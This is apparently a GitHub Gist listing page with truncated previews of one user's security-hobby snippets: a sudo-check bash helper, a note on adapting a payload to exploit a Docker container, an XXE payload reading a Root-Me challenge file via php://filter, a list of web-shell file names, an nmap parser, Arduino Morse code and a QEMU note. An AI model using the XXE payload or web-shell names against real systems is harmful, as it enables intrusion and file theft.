This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#/bin/bash | |
function info(){ | |
local -r message="${1}" | |
echo -e "\033[1;36m[+] ${message}\033[0m" 2>&1 | |
} | |
function check_sudo_and_run() { | |
# Vérifier si l'utilisateur a des droits sudo | |
if sudo -n true 2>/dev/null; then |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Based on https://github.com/swisskyrepo/PayloadsAllTheThings | |
This needs to be adapted to exploit a Docker container. Replace the IP with your own. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int led_pin = 1; | |
String code="-.-.-.--.--.--.-.-.-"; | |
int tl=500; | |
int pause=tl*2; | |
void setup(){} | |
void loop() { | |
for(int i=0;i<code.length();i++) | |
{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Braille | |
English | |
Grecize | |
Judaise | |
Judaize | |
Melrose | |
Xeroxes | |
abandon | |
abashes | |
abasing |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
023.jsp | |
08小组内部交流专用.asp | |
12309.php | |
1427683968524.jpg | |
1.png | |
2.png | |
3fexe Shell.asp | |
3.png | |
404 infiltrate team.asp | |
404 Not Found.php |
https://forms.gle/bvbE9S3JcroHhLZA8 This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# <HOST>,<PORT>,<whatever> | |
# used as nmaptocsv parser : https://github.com/maaaaz/nmaptocsv/ | |
# | |
# Takes as input | |
# toto,value | |
# toto, value1 | |
# tata, value | |
# tata value1 | |
# | |
# gives at output |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE rss [ | |
<!ELEMENT title ANY> | |
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://challenge01.root-me.org/web-serveur/ch29/index.php" > | |
]> | |
<rss version="1.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>bb</title> | |
<link>http://127.0.0.1</link> | |
<description>A</description> |
I have a collection of QEMU VMs for different CPU Architectures. In an attempt to fill in some gaps on architectures I lacked VMs for, I decided to spin up a PowerPC32 VM under QEMU. I chose Debian-PowerPC as the OS.
Install the prerequisite PowerPC packages:
# apt-get install qemu-system-ppc openbios-ppc
NewerOlder